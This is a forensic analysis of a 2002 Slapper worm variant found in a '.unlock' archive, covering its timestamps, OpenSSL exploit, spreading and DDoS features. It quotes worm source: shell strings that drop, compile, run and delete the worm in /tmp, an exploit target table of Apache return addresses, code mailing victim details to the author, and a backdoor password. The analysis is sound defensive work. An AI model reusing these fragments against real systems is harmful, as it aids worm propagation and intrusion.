Analysis performed on Linux.
md5sum .unlock -> a03b5be9264651ab30f2223592befb42 .unlock sha1sum .unlock -> 4b018cdfdbcf71ddaa789e8ecc9ed7700660021a .unlock
Opening the file in hexl-mode under emacs we can read the hex sequence of the beginning of file. 00000000: 1f8b 0800 ... We can now search the sequence under google and quickly find references of .tgz files. After renaming the file as unlock.tar.gz we find out that our hypothesis was true and that we can extract the files contained in the archive A timestamp is stored in gzip files and can be retrieved by the command : export TZ=GMT; gzip -lvN unlock.tar.gz We get the date Sep 20 10:59 (GMT Time). Note that the date and time depend on the timezone set on the system therefore it is necessary to set the timezone before calling gzip -lvN Fixstamp gives us the complete date : Fri Sep 20 10:59:04 2002 (fixstamp can be downloaded from ftp://metalab.unc.edu/pub/Linux/utils/file) We can get rid of the timezone by replacing ctime by asctime(gmtime(&stamp)) in the source code of fixstamp
The date and time of the files are the following (GMT) -rw-r--r-- root/wheel 70981 2002-09-20 13:28:11 .unlock.c -rw-r--r-- root/wheel 2792 2002-09-19 21:57:48 .update.c The file .unlock.c has a date posterior to the gzip timestamp This could indicate that the system date has been modified between the modification of .unlock.c and the creation of tgz archive According to the source code, the file has been created by contem@efnet and modified by aion@ukr.net, probably under windows plateform (carriage returns in the file) In the archives of bugtraq on SecurityFocus site, we can find that this is a version of Slapper Worm and (this is the .C variant according to the name of temporary files created by the worm - CAN-2002-0656) According to Symantec the worm was discovered on september the 13th.
The process name is httpd (same as apache): Line 1423 : compilation of executable file "gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto; " Line 1425-1426 : execution of worm sprintf(rcv, "/tmp/httpd %s; /tmp/update; \n",localip); writem(sockfd,rcv); The command string is passed to the shell launched by the exploit.
The files are transfered as uuencoded gzipped tar file.
We find it at lines 1416 to 1422 and by analyzing zhdr and
encode functions.
writem(sockfd,"cat > /tmp/.unlock.uu << __eof__; \n");
zhdr(1);
encode(sockfd);
zhdr(0);
writem(sockfd,"__eof__\n");
writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu; "
"tar xzf /tmp/.unlock -C /tmp/; "
* zhdr adds the gzip header
* encode uuencodes /tmp/.unlock file
(the code of encode function comes from uuencode.c source)
The files which are created in the whole process are :
/tmp/.unlock.uu
/tmp/.unlock.c
/tmp/.update.c
/tmp/httpd
/tmp/update
/tmp/.unlock
The files are erased by the worm (line 1427)
writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
The worm scans HTTP port (port 80)
Line 67 : #define SCANPORT 80
Line 1923 : atcp_sync_connect(&clients[n],srv,SCANPORT);
The address of the client is determined at random within declared /8 (line 291)
If the scan is succesful (atcp_sync_check return ASUCCESS on line 1927) then
the worm tries the exploit on port 443 (line 1933)
The port 443 (HTTPS) is used for the exploit (line 1698)
The worm tries to exploit OpenSSL vulnerabilities as we can find on
lines 1697 to 1762.
Advisory CA-2002-23
Searching Google for the keywords bkbk and exploit, you get
the original exploit code released on securitybugware
http://www.securitybugware.org/Other/5580.html
The exploit is for various Linux plateforms as we find on lines 1245 to 1269
architectures[] = {
{"Gentoo", "", 0x08086c34},
{"Debian", "1.3.26", 0x080863cc},
{"Red-Hat", "1.3.6", 0x080707ec},
{"Red-Hat", "1.3.9", 0x0808ccc4},
{"Red-Hat", "1.3.12", 0x0808f614},
{"Red-Hat", "1.3.12", 0x0809251c},
{"Red-Hat", "1.3.19", 0x0809af8c},
{"Red-Hat", "1.3.20", 0x080994d4},
{"Red-Hat", "1.3.26", 0x08161c14},
{"Red-Hat", "1.3.23", 0x0808528c},
{"Red-Hat", "1.3.22", 0x0808400c},
{"SuSE", "1.3.12", 0x0809f54c},
{"SuSE", "1.3.17", 0x08099984},
{"SuSE", "1.3.19", 0x08099ec8},
{"SuSE", "1.3.20", 0x08099da8},
{"SuSE", "1.3.23", 0x08086168},
{"SuSE", "1.3.23", 0x080861c8},
{"Mandrake", "1.3.14", 0x0809d6c4},
{"Mandrake", "1.3.19", 0x0809ea98},
{"Mandrake", "1.3.20", 0x0809e97c},
{"Mandrake", "1.3.23", 0x08086580},
{"Slackware", "1.3.26", 0x083d37fc},
{"Slackware", "1.3.26",0x080b2100}
};
Mail sent to aion@ukr.net after connecting to the server
freemail.ukr.net
The info sent is the hostid, hostname of victim machine
and address ip of the parent machine (sip, which is the
argument passed to the program)
Lines 122-124
sprintf(cmdbuf," hostid: %d \r\n"
" hostname: %s \r\n"
" att_from: %s \r\n",gethostid(),buffer,sip);
This part has been added to aion according to the comments (line 1801)
where we find the call to mailme
The worm communicates with other infected machines via port UDP (port 4156) as we can see on lines 877 to 921
Some of the built in functionalities to attack other networks are : Distributed Denials of Service : UDP flood (lines 2205-2245) - Flooding by sending strings of rp->size bytes (line 2235) - Targets rp->port or random port if rp->port==0 (line 2229) - Flood for rp->secs seconds TCP flood (lines 2246-2277) - Connect and immediate close (lines 2268-2269) - Targets rp->port or random port if rp->port==0 - Flood for rp->secs seconds IPv6 TCP flood (lines 2279-2306) - Connect and immediate close (lines 2297-2298) - Targets rp->port or random port if rp->port==0 - Flood for rp->secs seconds DNS flood (lines 2308-2385) - DNS queries - Flood for rp->secs seconds Scan : Email scan (lines 2386-2409)
This is a backdoor which executes shell commands when receiving the password aion1981 on the port 1052 The code of .update.c is straightforward.
The purpose of these two values is to make the daemon more difficult to detect on the victim machine. The daemon sleeps most of the time and as it does not listen on any port, you don't see it when you use lsof. lsof |grep LISTEN The drawback for the attacker is that he has only an UPTIME time window to connect to the victim machine so he has to try many times before successing.